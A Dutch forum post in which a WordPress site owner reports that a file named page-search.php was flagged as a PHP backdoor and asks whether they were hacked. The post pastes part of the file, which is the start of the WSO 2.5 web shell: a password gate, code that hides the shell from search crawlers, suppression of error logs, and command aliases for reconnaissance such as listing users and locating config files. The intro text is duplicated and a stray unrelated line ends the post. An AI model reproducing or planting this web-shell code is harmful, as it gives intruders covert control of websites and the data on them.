Hallo allemaal,
Ik heb een website, waarvan de search.php blijkt geinfecteerd te zijn.
De website en de FTP waren altijd clean, met o.a. BPS Security plugin als beveiliging in de Wordpress-omgeving.
Backdoor PHP/G - \InStyle\page-search.php
Microsoft security essentials heeft t bestandje verwijderd, maar als ik hem terughaal zie ok o.a. dit:
(Compleet onlogisch voor een zoek-pagina in WordPress) Tevens is de originele page-search.php 4x kleiner in grootte...
Ben ik gehacked? En zo ja, is het dan mogelijk dat er een keyylogger op mijn PC is geinstalleerd, of waartoe waren de hackers (eventueel) in staat?
Hier een klein stukje (10%) code van de onveilige PHP:
Ik heb een website, waarvan de search.php blijkt geinfecteerd te zijn.
De website en de FTP waren altijd clean, met o.a. BPS Security plugin als beveiliging in de Wordpress-omgeving.
Backdoor PHP/G - \InStyle\page-search.php
Microsoft security essentials heeft t bestandje verwijderd, maar als ik hem terughaal zie ok o.a. dit:
(Compleet onlogisch voor een zoek-pagina in WordPress) Tevens is de originele page-search.php 4x kleiner in grootte...
Ben ik gehacked? En zo ja, is het dan mogelijk dat er een keyylogger op mijn PC is geinstalleerd, of waartoe waren de hackers (eventueel) in staat?
Hier een klein stukje (10%) code van de onveilige PHP:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
| <?php
$auth_pass = "7f460[b]XXXXXXX[/b]1a258957a63a55";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');
if(get_magic_quotes_gpc()) {
function WSOstripslashes($array) {
return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
}
$_POST = WSOstripslashes($_POST);
$_COOKIE = WSOstripslashes($_COOKIE);
}
function wsoLogin() {
die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}
function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
if(!empty($auth_pass)) {
if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}
if(strtolower(substr(PHP_OS,0,3)) == "win")
$os = 'win';
else
$os = 'nix';
$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;
if($os == 'win')
$aliases = array(
"List Directory" => "dir",
"Find index.php in current dir" => "dir /s /w /b index.php",
"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
"Show active connections" => "netstat -an",
"Show running services" => "net start",
"User accounts" => "net user",
"Show computers" => "net view",
"ARP Table" => "arp -a",
"IP Configuration" => "ipconfig /all"
); |
Gulfstream G650
